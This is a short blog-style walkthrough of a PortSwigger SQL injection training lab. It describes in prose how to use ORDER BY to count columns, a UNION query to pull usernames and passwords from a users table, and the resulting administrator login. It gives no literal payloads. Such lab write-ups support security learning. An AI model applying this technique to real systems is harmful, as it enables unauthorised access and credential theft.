Hello everyone , in this post I will be sharing my solution for portswigger sqli lab # 3 so without further ado let’s jump in
SQL injection UNION attack, retrieving data from other tables
This lab is continuation from the previous sqli labs and in this we have to retrieve the data from users table having column names username and password knowing that the GET parameter category is vulnerable to sqli , since the tables are changed we may have to know columns from "ORDERY BY" query in sqli
Trying to find the column number using order by
So we have only 2 columns in the table
Since we know the table name we can grab data from it using the column names which are also known
With this we can grab the usernames and passwords from table
Now in order to complete this lab we need to login as administrator so we have his password we just need to login , so going to My Account
And we are done with this lab !
